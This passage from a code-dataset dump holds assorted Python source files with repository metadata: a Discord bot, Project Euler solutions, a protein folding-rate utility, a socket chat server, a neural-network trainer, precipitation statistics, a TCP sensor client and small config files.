if u'\u4e00' <= ch <= u'\u9fff':
return True
return False
def pre_process_words(one_line):
for i in range(len(one_line)):
word = one_line[i]
one_line[i] = pre_process(word)
return one_line
def pre_process(one_word):
if len(one_word) >= 2 and one_word[-1] == u'\n':
print(one_word)
word = one_word.replace(u'\n', u'')
return word
return one_word
| [
"quan.zhibin@gmail.com"
] | quan.zhibin@gmail.com |
7f1f1571eeef254cb2419b037dea23d48450dfd5 | 1fda1b125008512c0c8f6974bdb79a7333f05804 | /chuckle_bot/single_channel_bot.py | f198aa12380957eaa55d67b6c5eda0d17e69368a | [
"Apache-2.0"
] | permissive | GTOliver/Chucklebot | 8a8a75ffa4fa9e127ff1b2cb3c3b4be1d7fd72b8 | 488ee5476a731ebc89db2ae6d69d7de2fcd76925 | refs/heads/main | 2023-01-23T03:08:17.986373 | 2020-12-12T01:04:20 | 2020-12-12T01:04:20 | 320,717,436 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,372 | py | import discord
class Bot(discord.Client):
def __init__(self, guild_name, channel_id, logger=None, **kwargs):
"""
Bot for use with a single Discord Guild and Text Channel
:param guild_name: The name of the Discord Guild to join
:type guild_name: string
:param channel_id: The ID of the channel to be active in
:type channel_id: int
:param logger: An optional logger to
"""
super().__init__(**kwargs)
self._main_guild_name = guild_name
self._main_channel_id = channel_id
self._logger = logger
self.main_guild = None
self.main_channel = None
self._on_ready_msg = None
self._message_handler = None
def set_ready_message(self, msg):
""" Set a message to be sent to the channel on connection
:param msg: Message to be sent
:type msg: string
"""
self._on_ready_msg = msg
def set_message_handler(self, handler):
""" Set a handler to respond to Discord messages in the main channel.
The handler must be an async function which takes a discord.Message.
:param handler: The handler for message
:type handler: An async function (discord.Message)
"""
self._message_handler = handler
async def on_ready(self):
self._log_info("Connection Established")
for guild in self.guilds:
if guild.name == self._main_guild_name:
self.main_guild = guild
break
self.main_channel = self.main_guild.get_channel(self._main_channel_id)
if msg := self._on_ready_msg:
await self.send_message(msg)
async def on_message(self, message):
if message.channel.id == self._main_channel_id and not message.author.id == self.user.id:
self._log_info("Received message in main channel. ID: {}".format(message.id))
await self._message_handler(message)
async def send_message(self, message):
""" Send a message to the main channel
:param message: The text to send to the server
:type message: string
"""
self._log_info("Sending message: {}".format(message))
await self.main_channel.send(message)
def _log_info(self, info):
if self._logger:
self._logger.log_message(info)
| [
"gtoliver90@gmail.com"
] | gtoliver90@gmail.com |
b78211423a07f04e32c92442125f76f6b06bb721 | 5c928ded0bd75bec3a36a0b47a149876aa897d45 | /Problem056.py | 3a6818660aed9c805c353fa2259005e9613eb888 | [] | no_license | AkihikoTakahashi/ProjectEuler | 3925b4b6384bb92a5eb1d49a7092962c16dbca3e | 1734b1b19778511b4a9d5d2cc7402153b9b3d51d | refs/heads/master | 2023-06-22T18:54:30.021732 | 2023-06-09T02:41:26 | 2023-06-09T02:41:26 | 191,503,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 266 | py | # coding: utf-8
def digit_sum(n):
s = 0
while n > 0:
s += n % 10
n //= 10
return s
def main():
return max(
digit_sum(pow(a, b)) for a in range(1, 100) for b in range(1, 100))
if __name__ == '__main__':
print(main())
| [
"fermatslasttheoremisdifficult@gmail.com"
] | fermatslasttheoremisdifficult@gmail.com |
9383a57b449072c8fb83a0149c8e475acf633851 | 84f652ced4a7b1ae1e173ffaa89af6e7dcdcca9c | /ssbio/protein/sequence/properties/kinetic_folding_rate.py | 0c00d07dd1a2d97259dee196bd91f6e2ddaa71ba | [
"MIT"
] | permissive | JoshuaMeyers/ssbio | a1cf1aa521d2ca9248f0efb6c042d292f6a8c320 | 624618602437e2c2e4adf90962adcef3af2d5b40 | refs/heads/master | 2023-01-24T20:14:33.956913 | 2020-12-07T16:50:58 | 2020-12-07T16:50:58 | 319,367,246 | 0 | 0 | MIT | 2020-12-07T15:47:45 | 2020-12-07T15:47:45 | null | UTF-8 | Python | false | false | 2,456 | py | __author__ = 'Ke Chen'
__email__ = "kec003@ucsd.edu"
# TODO: replace urllib usage with six library
try:
from urllib.request import urlopen
from urllib.request import build_opener
from urllib.request import HTTPCookieProcessor
from urllib.parse import urlparse
from urllib.parse import urlencode
except ImportError:
from urlparse import urlparse
from urllib2 import urlopen
from urllib import urlencode
from urllib2 import build_opener
from urllib2 import HTTPCookieProcessor
import math
import scipy.constants
import ssbio.protein.sequence.utils
def get_foldrate(seq, secstruct):
"""Submit sequence and structural class to FOLD-RATE calculator (http://www.iitm.ac.in/bioinfo/fold-rate/)
to calculate kinetic folding rate.
Args:
seq (str, Seq, SeqRecord): Amino acid sequence
secstruct (str): Structural class: `all-alpha``, ``all-beta``, ``mixed``, or ``unknown``
Returns:
float: Kinetic folding rate k_f
"""
seq = ssbio.protein.sequence.utils.cast_to_str(seq)
url = 'http://www.iitm.ac.in/bioinfo/cgi-bin/fold-rate/foldrateCalculator.pl'
values = {'sequence': seq, 'eqn': secstruct}
data = urlencode(values)
data = data.encode('ASCII')
response = urlopen(url, data)
result = str(response.read())
ind = str.find(result, 'The folding rate,')
result2 = result[ind:ind + 70]
ind1 = str.find(result2, '=')
ind2 = str.find(result2, '/sec')
rate = result2[ind1 + 2:ind2]
return rate
def get_foldrate_at_temp(ref_rate, new_temp, ref_temp=37.0):
"""Scale the predicted kinetic folding rate of a protein to temperature T, based on the relationship ln(k_f)∝1/T
Args:
ref_rate (float): Kinetic folding rate calculated from the function :func:`~ssbio.protein.sequence.properties.kinetic_folding_rate.get_foldrate`
new_temp (float): Temperature in degrees C
ref_temp (float): Reference temperature, default to 37 C
Returns:
float: Kinetic folding rate k_f at temperature T
"""
# Not much data available on this slope value, however its effect on growth rate in a model is very small
slope = 22000
# Get folding rate for the reference temperature
preFactor = float(ref_rate) + slope / (float(ref_temp) + 273.15)
# Calculate folding rate at desired temperature
rate = math.exp(preFactor - slope / (float(new_temp) + 273.15))
return rate | [
"nmih@ucsd.edu"
] | nmih@ucsd.edu |
f6ea1e9dc4664869333becf4eabb4e33c8a9ff08 | 3e74c6405a5825c128bd2841484b9394e5a3e6be | /venv/Scripts/pip-script.py | d01ca0c6db4c6a37c1bd962a471f383bfd47ae0f | [] | no_license | instance0326/t_ti | e273dd192fafd01778dd9ebed2bf24a276310ed4 | 0eb15187b762f357592745543881e118605721b8 | refs/heads/master | 2020-08-27T22:56:21.105510 | 2019-10-25T13:08:16 | 2019-10-25T13:08:16 | 217,509,892 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | #!C:\Users\User\PycharmProjects\opencv\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
)
| [
"instance0326@gmail.com"
] | instance0326@gmail.com |
1b03a134c4d0562307042d27baa1c91aec3d2484 | e97451f42a5bb5834baf581dcbbcf273eb6562ff | /[060] Prime pair sets/main.py | c946ea518c0f4d7dfe45f4e931cabf0472780557 | [] | no_license | m-tkach/ProjectEuler | 561d13137a8e5e9e63f028e0dd3abd57aa788b9e | ee118e0889fa0c48662f62b42708c2009ddbc4ce | refs/heads/master | 2020-04-15T01:54:24.682833 | 2015-04-13T20:23:44 | 2015-04-13T20:23:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,339 | py | SIZE = 5
primes = [2, 3,]
def gen_primes(n):
if primes[-1] >= n:
return
for x in range(primes[-1]+2, n+1, 2):
for p in primes:
if p * p > x:
primes.append(x)
break
if x % p == 0:
break
def is_prime(x):
gen_primes(int(x**0.5) + 1)
for p in primes:
if p * p > x:
return True
if x % p == 0:
return False
return True
def is_div_by_3(x, y):
s = 0
while x > 0:
s += x % 10
x //= 10
while y > 0:
s += y % 10
y //= 10
return s % 3 == 0
def is_ok(x, y):
if is_div_by_3(x, y):
return False
a = int(str(x) + str(y))
if not is_prime(a):
return False
b = int(str(y) + str(x))
return is_prime(b)
def result(candidates):
return sum(candidates)
def is_cut(candidates, last_index, current_answer):
res = result(candidates)
if res >= current_answer:
return True
for i, c in enumerate(candidates):
if c > (SIZE - i) * current_answer:
return True
if last_index + 1 < len(primes):
left = SIZE - len(candidates)
min_left_weight = left * primes[last_index + 1]
if res + min_left_weight >= current_answer:
return True
return False
def go(candidates, last_index, current_answer):
if is_cut(candidates, last_index, current_answer):
return current_answer
if len(candidates) == SIZE:
res = result(candidates)
if res < current_answer:
return res
return current_answer
for i, p in enumerate(primes[last_index+1:]):
for c in candidates:
if not is_ok(p, c):
break
else:
candidates.append(p)
res = go(candidates, i+last_index+1, current_answer)
if current_answer > res:
current_answer = res
candidates.pop()
return current_answer
def calc():
answer = 1000000000
gen_primes(2000)
for i, p in enumerate(primes):
res = go([p,], i, answer)
if res < answer:
answer = res
return answer
print(calc())
| [
"m.tkach@samsung.com"
] | m.tkach@samsung.com |
013db56b03036275322d68bfb8a9d4f509a487c8 | 927d302f021a9ebbf72c19e40667a61c4637d120 | /GUI Implementation Working/server.py | 84bd401ff5a87e1bc01fc7ca08c12890e2736655 | [] | no_license | Sumit112192/Python-Chatroom | 9f8bd24622fe5fb9fccdab0f90f3e300487acef0 | 96636c16c012316d09242769197a162341a8efcf | refs/heads/main | 2023-05-28T11:31:01.667284 | 2021-06-15T21:42:41 | 2021-06-15T21:42:41 | 377,807,712 | 0 | 0 | null | 2021-06-17T11:31:35 | 2021-06-17T11:31:35 | null | UTF-8 | Python | false | false | 3,749 | py | import socket
import threading
host = '127.0.0.1'
port = 55555
# to start server
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((host, port))
server.listen()
clients = []
nicknames = []
def broadcast_msg(message, bmsg):
for client in clients:
client.send(message)
print("\n----------------- Broadcast Log ------------")
print("\t\t\t\t\t" + bmsg)
print("------------")
def manage(client):
while True:
try:
message = client.recv(1024).decode('ascii')
if message.startswith('KICK'):
if nicknames[clients.index(client)] == 'admin':
name_to_kick = message[5:]
kick_user(name_to_kick)
else:
client.send('Command was refused!'.encode('ascii'))
elif message.startswith('BAN'):
if nicknames[clients.index(client)] == 'admin':
name_to_ban = message[4:]
kick_user(name_to_ban)
with open('bans.txt', 'a') as f:
f.write(f'{name_to_ban}\n')
print(f'{name_to_ban} was banned from the server')
else:
client.send('Command was refused!'.encode('ascii'))
else:
message2 = message.encode('ascii')
broadcast_msg(message2, message)
except: # on exception
if client in clients:
index = clients.index(client)
clients.remove(client)
client.close()
nickname = nicknames[index]
bmsg = f'{nickname} has left the chat.'
broadcast_msg(
bmsg.encode('ascii'), bmsg)
print("Client has left the chat with nickname ", nickname)
nicknames.remove(nickname)
break
def receive():
while True:
client, address = server.accept()
print(f'New Client is connected with the Address = {str(address)}')
client.send('NICK'.encode('ascii'))
nickname = client.recv(1024).decode('ascii') # nick
with open('bans.txt', 'r') as f:
bans = f.readlines()
if f'{nickname}\n' in bans:
client.send('BAN'.encode('ascii')) # ban
client.close()
continue
if nickname == 'admin':
client.send('pass'.encode('ascii'))
password = client.recv(1024).decode('ascii') # pass
if password != 'adminpass':
client.send('Incorrect'.encode('ascii'))
client.close()
continue
nicknames.append(nickname)
clients.append(client)
print(f'Client\'s nickname : {nickname}')
bmsg = f'{nickname} has just joined the chat !\n'
broadcast_msg(bmsg.encode('ascii'), bmsg)
client.send(f'Successfully Connected to Server\n '.encode('ascii'))
thread = threading.Thread(target=manage, args=(client,))
thread.start()
def kick_user(name):
try:
if name in nicknames:
name_index = nicknames.index(name)
client_to_kick = clients[name_index]
clients.remove(client_to_kick)
client_to_kick.send('You were kicked '.encode('ascii'))
client_to_kick.close()
nicknames.remove(name)
bmsg = f'{name} was kicked by an admin'
broadcast_msg(bmsg.encode('ascii'), bmsg)
except:
print("error here")
print("-----------------------------server is running-------------------------")
receive()
| [
"noreply@github.com"
] | Sumit112192.noreply@github.com |
0fb50cf402fbbce2880c35c8958732b192e5f964 | a0bcd1fbd8e95fff14b0780187de5d6130a07dca | /src/neural/corpus/network2.py | f2640fceafd51500ba884604b3bb228bebfcea52 | [] | no_license | ankit96/rejigthesystem | b8f9eb864562d6fbc9fd4b157986065a8630368d | a155349f3f5f42fae7dc33ef4cc8af481b428721 | refs/heads/master | 2022-08-12T03:10:44.233563 | 2018-03-10T20:06:58 | 2018-03-10T20:06:58 | 60,528,888 | 1 | 1 | null | 2022-07-06T19:23:29 | 2016-06-06T13:13:58 | OpenEdge ABL | UTF-8 | Python | false | false | 13,965 | py | """network2.py
~~~~~~~~~~~~~~
An improved version of network.py, implementing the stochastic
gradient descent learning algorithm for a feedforward neural network.
Improvements include the addition of the cross-entropy cost function,
regularization, and better initialization of network weights. Note
that I have focused on making the code simple, easily readable, and
easily modifiable. It is not optimized, and omits many desirable
features.
"""
#### Libraries
# Standard library
import json
import random
import sys
# Third-party libraries
import numpy as np
#### Define the quadratic and cross-entropy cost functions
class QuadraticCost(object):
@staticmethod
def fn(a, y):
"""Return the cost associated with an output ``a`` and desired output
``y``.
"""
return 0.5*np.linalg.norm(a-y)**2
@staticmethod
def delta(z, a, y):
"""Return the error delta from the output layer."""
return (a-y) * sigmoid_prime(z)
class CrossEntropyCost(object):
@staticmethod
def fn(a, y):
"""Return the cost associated with an output ``a`` and desired output
``y``. Note that np.nan_to_num is used to ensure numerical
stability. In particular, if both ``a`` and ``y`` have a 1.0
in the same slot, then the expression (1-y)*np.log(1-a)
returns nan. The np.nan_to_num ensures that that is converted
to the correct value (0.0).
"""
return np.sum(np.nan_to_num(-y*np.log(a)-(1-y)*np.log(1-a)))
@staticmethod
def delta(z, a, y):
"""Return the error delta from the output layer. Note that the
parameter ``z`` is not used by the method. It is included in
the method's parameters in order to make the interface
consistent with the delta method for other cost classes.
"""
return (a-y)
#### Main Network class
class Network(object):
def __init__(self, sizes, cost=CrossEntropyCost):
"""The list ``sizes`` contains the number of neurons in the respective
layers of the network. For example, if the list was [2, 3, 1]
then it would be a three-layer network, with the first layer
containing 2 neurons, the second layer 3 neurons, and the
third layer 1 neuron. The biases and weights for the network
are initialized randomly, using
``self.default_weight_initializer`` (see docstring for that
method).
"""
self.num_layers = len(sizes)
self.sizes = sizes
self.default_weight_initializer()
self.cost=cost
def default_weight_initializer(self):
"""Initialize each weight using a Gaussian distribution with mean 0
and standard deviation 1 over the square root of the number of
weights connecting to the same neuron. Initialize the biases
using a Gaussian distribution with mean 0 and standard
deviation 1.
Note that the first layer is assumed to be an input layer, and
by convention we won't set any biases for those neurons, since
biases are only ever used in computing the outputs from later
layers.
"""
self.biases = [np.random.randn(y, 1) for y in self.sizes[1:]]
self.weights = [np.random.randn(y, x)/np.sqrt(x)
for x, y in zip(self.sizes[:-1], self.sizes[1:])]
def large_weight_initializer(self):
"""Initialize the weights using a Gaussian distribution with mean 0
and standard deviation 1. Initialize the biases using a
Gaussian distribution with mean 0 and standard deviation 1.
Note that the first layer is assumed to be an input layer, and
by convention we won't set any biases for those neurons, since
biases are only ever used in computing the outputs from later
layers.
This weight and bias initializer uses the same approach as in
Chapter 1, and is included for purposes of comparison. It
will usually be better to use the default weight initializer
instead.
"""
self.biases = [np.random.randn(y, 1) for y in self.sizes[1:]]
self.weights = [np.random.randn(y, x)
for x, y in zip(self.sizes[:-1], self.sizes[1:])]
def feedforward(self, a):
"""Return the output of the network if ``a`` is input."""
for b, w in zip(self.biases, self.weights):
a = sigmoid(np.dot(w, a)+b)
return a
def SGD(self, training_data, epochs, mini_batch_size, eta,
lmbda = 0.0,
evaluation_data=None,
monitor_evaluation_cost=False,
monitor_evaluation_accuracy=False,
monitor_training_cost=False,
monitor_training_accuracy=False):
"""Train the neural network using mini-batch stochastic gradient
descent. The ``training_data`` is a list of tuples ``(x, y)``
representing the training inputs and the desired outputs. The
other non-optional parameters are self-explanatory, as is the
regularization parameter ``lmbda``. The method also accepts
``evaluation_data``, usually either the validation or test
data. We can monitor the cost and accuracy on either the
evaluation data or the training data, by setting the
appropriate flags. The method returns a tuple containing four
lists: the (per-epoch) costs on the evaluation data, the
accuracies on the evaluation data, the costs on the training
data, and the accuracies on the training data. All values are
evaluated at the end of each training epoch. So, for example,
if we train for 30 epochs, then the first element of the tuple
will be a 30-element list containing the cost on the
evaluation data at the end of each epoch. Note that the lists
are empty if the corresponding flag is not set.
"""
if evaluation_data: n_data = len(evaluation_data)
n = len(training_data)
evaluation_cost, evaluation_accuracy = [], []
training_cost, training_accuracy = [], []
for j in xrange(epochs):
random.shuffle(training_data)
mini_batches = [
training_data[k:k+mini_batch_size]
for k in xrange(0, n, mini_batch_size)]
for mini_batch in mini_batches:
self.update_mini_batch(
mini_batch, eta, lmbda, len(training_data))
print "Epoch %s training complete" % j
if monitor_training_cost:
cost = self.total_cost(training_data, lmbda)
training_cost.append(cost)
print "Cost on training data: {}".format(cost)
if monitor_training_accuracy:
accuracy = self.accuracy(training_data, convert=True)
training_accuracy.append(accuracy)
print "Accuracy on training data: {} / {}".format(
accuracy, n)
if monitor_evaluation_cost:
cost = self.total_cost(evaluation_data, lmbda, convert=True)
evaluation_cost.append(cost)
print "Cost on evaluation data: {}".format(cost)
if monitor_evaluation_accuracy:
accuracy = self.accuracy(evaluation_data)
evaluation_accuracy.append(accuracy)
print "Accuracy on evaluation data: {} / {}".format(
self.accuracy(evaluation_data), n_data)
print
return evaluation_cost, evaluation_accuracy, \
training_cost, training_accuracy
def update_mini_batch(self, mini_batch, eta, lmbda, n):
"""Update the network's weights and biases by applying gradient
descent using backpropagation to a single mini batch. The
``mini_batch`` is a list of tuples ``(x, y)``, ``eta`` is the
learning rate, ``lmbda`` is the regularization parameter, and
``n`` is the total size of the training data set.
"""
nabla_b = [np.zeros(b.shape) for b in self.biases]
nabla_w = [np.zeros(w.shape) for w in self.weights]
for x, y in mini_batch:
delta_nabla_b, delta_nabla_w = self.backprop(x, y)
nabla_b = [nb+dnb for nb, dnb in zip(nabla_b, delta_nabla_b)]
nabla_w = [nw+dnw for nw, dnw in zip(nabla_w, delta_nabla_w)]
self.weights = [(1-eta*(lmbda/n))*w-(eta/len(mini_batch))*nw
for w, nw in zip(self.weights, nabla_w)]
self.biases = [b-(eta/len(mini_batch))*nb
for b, nb in zip(self.biases, nabla_b)]
def backprop(self, x, y):
"""Return a tuple ``(nabla_b, nabla_w)`` representing the
gradient for the cost function C_x. ``nabla_b`` and
``nabla_w`` are layer-by-layer lists of numpy arrays, similar
to ``self.biases`` and ``self.weights``."""
nabla_b = [np.zeros(b.shape) for b in self.biases]
nabla_w = [np.zeros(w.shape) for w in self.weights]
# feedforward
activation = x
activations = [x] # list to store all the activations, layer by layer
zs = [] # list to store all the z vectors, layer by layer
for b, w in zip(self.biases, self.weights):
z = np.dot(w, activation)+b
zs.append(z)
activation = sigmoid(z)
activations.append(activation)
# backward pass
delta = (self.cost).delta(zs[-1], activations[-1], y)
nabla_b[-1] = delta
nabla_w[-1] = np.dot(delta, activations[-2].transpose())
# Note that the variable l in the loop below is used a little
# differently to the notation in Chapter 2 of the book. Here,
# l = 1 means the last layer of neurons, l = 2 is the
# second-last layer, and so on. It's a renumbering of the
# scheme in the book, used here to take advantage of the fact
# that Python can use negative indices in lists.
for l in xrange(2, self.num_layers):
z = zs[-l]
sp = sigmoid_prime(z)
delta = np.dot(self.weights[-l+1].transpose(), delta) * sp
nabla_b[-l] = delta
nabla_w[-l] = np.dot(delta, activations[-l-1].transpose())
return (nabla_b, nabla_w)
def accuracy(self, data, convert=False):
"""Return the number of inputs in ``data`` for which the neural
network outputs the correct result. The neural network's
output is assumed to be the index of whichever neuron in the
final layer has the highest activation.
The flag ``convert`` should be set to False if the data set is
validation or test data (the usual case), and to True if the
data set is the training data. The need for this flag arises
due to differences in the way the results ``y`` are
represented in the different data sets. In particular, it
flags whether we need to convert between the different
representations. It may seem strange to use different
representations for the different data sets. Why not use the
same representation for all three data sets? It's done for
efficiency reasons -- the program usually evaluates the cost
on the training data and the accuracy on other data sets.
These are different types of computations, and using different
representations speeds things up. More details on the
representations can be found in
mnist_loader.load_data_wrapper.
"""
if convert:
results = [(np.argmax(self.feedforward(x)), np.argmax(y))
for (x, y) in data]
else:
results = [(np.argmax(self.feedforward(x)), y)
for (x, y) in data]
return sum(int(x == y) for (x, y) in results)
def total_cost(self, data, lmbda, convert=False):
"""Return the total cost for the data set ``data``. The flag
``convert`` should be set to False if the data set is the
training data (the usual case), and to True if the data set is
the validation or test data. See comments on the similar (but
reversed) convention for the ``accuracy`` method, above.
"""
cost = 0.0
for x, y in data:
a = self.feedforward(x)
if convert: y = vectorized_result(y)
cost += self.cost.fn(a, y)/len(data)
cost += 0.5*(lmbda/len(data))*sum(
np.linalg.norm(w)**2 for w in self.weights)
return cost
def save(self, filename):
"""Save the neural network to the file ``filename``."""
data = {"sizes": self.sizes,
"weights": [w.tolist() for w in self.weights],
"biases": [b.tolist() for b in self.biases],
"cost": str(self.cost.__name__)}
f = open(filename, "w")
json.dump(data, f)
f.close()
#### Loading a Network
def load(filename):
"""Load a neural network from the file ``filename``. Returns an
instance of Network.
"""
f = open(filename, "r")
data = json.load(f)
f.close()
cost = getattr(sys.modules[__name__], data["cost"])
net = Network(data["sizes"], cost=cost)
net.weights = [np.array(w) for w in data["weights"]]
net.biases = [np.array(b) for b in data["biases"]]
return net
#### Miscellaneous functions
def vectorized_result(j):
"""Return a 10-dimensional unit vector with a 1.0 in the j'th position
and zeroes elsewhere. This is used to convert a digit (0...9)
into a corresponding desired output from the neural network.
"""
e = np.zeros((10, 1))
e[j] = 1.0
return e
def sigmoid(z):
"""The sigmoid function."""
return 1.0/(1.0+np.exp(-z))
def sigmoid_prime(z):
"""Derivative of the sigmoid function."""
return sigmoid(z)*(1-sigmoid(z))
| [
"ankit.sagwekar15@gmail.com"
] | ankit.sagwekar15@gmail.com |
8d15fa2b34e2b38cabe5d2e3754b92e1b1d34215 | 49bdc2959c2a133f5bba262af20a95ebf1d2fce8 | /admiralce/apps/ce_ledger/apps.py | c7da233bb0bc3998fc2a4ec272f12d2ae081f814 | [] | no_license | tonjohn/admiralce | ca6049ab3bf2f5193021158be2d1ce3ae3c51a9e | ebc7a2d12780641c997dcee1636ce09f1dbd2e06 | refs/heads/master | 2021-08-23T03:16:56.294892 | 2017-12-02T20:42:46 | 2017-12-02T20:42:46 | 110,373,547 | 1 | 2 | null | 2017-12-02T20:42:47 | 2017-11-11T19:25:57 | Python | UTF-8 | Python | false | false | 157 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class CeLedgerConfig(AppConfig):
name = 'ce_ledger'
| [
"kearlyaa@gmail.com"
] | kearlyaa@gmail.com |
92f278ef1be30da74797d4cdc0bf66045c5f2f1b | ffb56bbe3d383d002adb0a125f80067d78537492 | /code/is_bst/is_bst.py | 7765f85c9d0dc573a71b21bb9016aebc3169b70c | [] | no_license | Hackman-git/Data-structures | e1c5aab7a2f91c4345289673269a97da0c6e5f39 | f8c52c7bd16e601a29b9802fdbc8ae4ebe144077 | refs/heads/master | 2023-01-28T07:21:25.038192 | 2020-12-12T23:22:05 | 2020-12-12T23:22:05 | 320,939,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,174 | py | #!/usr/bin/python3
import sys, threading
sys.setrecursionlimit(10**7) # max depth of recursion
threading.stack_size(2**30) # new thread will get stack of such size
n = int(input().strip())
key = [0 for i in range(n)]
left_ind = [0 for i in range(n)]
right_ind = [0 for i in range(n)]
for i in range(n):
[a, b, c] = map(int, input().strip().split())
key[i] = a
left_ind[i] = b
right_ind[i] = c
inorderResult = []
def inOrder(root = 0):
global left_ind, right_ind,n
if n != 0:
if left_ind[root] != -1:
inOrder(left_ind[root])
if len(inorderResult) >= 1 and key[root] > inorderResult[-1]:
inorderResult.append(key[root])
elif len(inorderResult) == 0:
inorderResult.append(key[root])
else:
return
if right_ind[root] != -1:
inOrder(right_ind[root])
def IsBinarySearchTree(arr):
# Implement correct algorithm here
global n
if len(arr) == n:
return True
else:
return False
def main():
inOrder()
# print(" ".join(str(x) for x in inorderResult))
if IsBinarySearchTree(inorderResult):
print("CORRECT")
else:
print("INCORRECT")
threading.Thread(target=main).start()
| [
"abdulaigbenga96@gmail.com"
] | abdulaigbenga96@gmail.com |
626c922de9219080952e7221d26a8a4a2740ad29 | 6e8b606bca1eaddd8858fffc0fdeda039a438af5 | /source/precipitation/precip_stats_for_central_arctic_to_timeseries.py | 3af2eff5c86951f4471ed3fd8fddbaeec12bb877 | [] | no_license | andypbarrett/SnowOnSeaIce | 1f93a0523933fff0bfdd89fc87ad32b371bae359 | b8fe84a23bf790eb8efc43f4b89725fb7ba7d73c | refs/heads/master | 2023-01-20T11:53:30.835890 | 2023-01-18T17:43:19 | 2023-01-18T17:43:19 | 137,275,118 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,836 | py | #----------------------------------------------------------------------
# Calculates mean of precipitation stats for Arctic Ocean excluding
# Barents and Kara seas. This region conforms to the regions with
# data from the NP drifting stations.
#----------------------------------------------------------------------
import pandas as pd
import os
import utilities as util
from constants import arctic_mask_region as region
from constants import accumulation_period_filepath
def make_outfilepath(fili):
"""Returns output filepath"""
_, ext = os.path.splitext(fili)
return fili.replace(ext, '.npsnow_region.csv')
def precip_stats_for_central_arctic_to_time_series(reanalysis, verbose=False):
ds = util.load_annual_accumulation(reanalysis)
ds['drizzle'] = ds['precTot'] - ds['wetdayTot']
# Make mask for central Arctic excluding Barents and Kara seas
mask = util.read_region_mask()
newmask = (mask == region['CENTRAL_ARCTIC']) | \
(mask == region['BEAUFORT']) | \
(mask == region['CHUKCHI']) | \
(mask == region['LAPTEV']) | \
(mask == region['EAST_SIBERIAN'])
region_mean = ds.where(newmask).mean(dim=['x','y']).to_dataframe()
filo = make_outfilepath(accumulation_period_filepath[reanalysis])
#annual_accumulation_filepath[reanalysis].replace('.nc','.RegionSeries.csv')
print (f'Writing time series to {filo}')
region_mean.to_csv(filo)
return
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Calculates time series of average precip stats for NPSNOW Arctic region")
parser.add_argument('reanalysis', type=str, help='Reanalysis to process')
args = parser.parse_args()
precip_stats_for_central_arctic_to_time_series(args.reanalysis, verbose=True)
| [
"apbarret@nsidc.org"
] | apbarret@nsidc.org |
28218e56736c0aa387e0b52b1481f9011b706757 | 4711e47c536f4001ea0c2f2de5eae0c4b2eabf28 | /streaming_sensors/client_tcp_sensors.py | 86dfc753e0e409ce26a4f235f46f25928f6bdbc2 | [] | no_license | webvalley2015/PhysioWat | af6b2e43a680e37a7f13c6466885206b4671a9d1 | 595fc177a25510677e3b11936d49c9c6a463b4ab | refs/heads/master | 2021-01-15T11:43:18.515845 | 2015-07-10T13:26:45 | 2015-07-10T13:26:45 | 38,247,074 | 7 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,760 | py | import socket
import random
import sys
import time
import struct
import time
from socket import *
def recv_int(f):
x=struct.unpack('!i', f.recv(4))[0]
# print 'int: ', x
return x
def recv_long(f):
x=struct.unpack('!q', f.recv(8))[0]
# print 'long: ', x
return x
def recv_byte(f):
x=ord(f.recv(1)[0])
# print 'byte: ', x
return x
def recv_string(f):
l = ord(f.recv(1)[0])
x=f.recv(l)
# print 'str: ', x
return x
def recv_double(f):
x=struct.unpack('!d', f.recv(8))[0]
# print 'long: ', x
return x
def recv_header(f):
header={}
recv_byte(f)
recv_byte(f)
recv_byte(f)
ns=recv_byte(f)
header['sessionTag']=recv_string(f)
header['sensors']=[]
for i in xrange(ns):
recv_byte(f)
recv_byte(f)
recv_byte(f)
snrs={}
snrs['type']=recv_string(f)
snrs['name']=recv_string(f)
nl=recv_byte(f)
snrs['cols']=[]
for l in xrange(nl):
snrs['cols'].append(recv_string(f))
header['sensors'].append(snrs)
return header
def recv_pack(f,header):
recv_byte(f)
t = recv_byte(f)
data={}
if(t==100):
ids=recv_byte(f)
data['type']=ids
data['timestamp']=recv_long(f)
data['values']=[]
for i in xrange(len(header['sensors'][ids]['cols'])):
data['values'].append(recv_double(f))
elif(t==101):
data['type']='event'
data['timestamp']=recv_long(f)
ids=recv_byte(f)
data['code']=recv_int(f)
data['message']=recv_string(f)
return data
def main():
host = '192.168.205.243' # '127.0.0.1' can also be used
port = 2000
sock = socket()
#Connecting to socket
sock.connect((host, port)) #Connect takes tuple of host and port
#header=recv_header(sock)
#print header
header=recv_header(sock)
print header
while True:
print recv_pack(sock,header)
sock.close()
if __name__ == "__main__":
main()
| [
"cristoforetti@gmail.com"
] | cristoforetti@gmail.com |
85b30b9ab812a82ea1865fc9081398d8b613fc1e | 7a663432b426f471c991e481b88f0738df1d7c42 | /src/demorepo/__init__.py | b35050024df0b42f9e521473a8c07e147a02fee9 | [] | no_license | demosense/demorepo | c2aec1e6daddcbbb0482954545a2fb0605c73737 | 6b02c5153bcceb52d618d285567b625d29db9796 | refs/heads/master | 2020-04-07T16:16:09.230540 | 2018-04-09T11:30:16 | 2018-04-09T11:30:16 | 124,222,329 | 1 | 0 | null | 2018-04-29T19:09:20 | 2018-03-07T10:54:01 | Python | UTF-8 | Python | false | false | 46 | py | from . import commands
__all__ = ['commands'] | [
"javier.cozar@uclm.es"
] | javier.cozar@uclm.es |
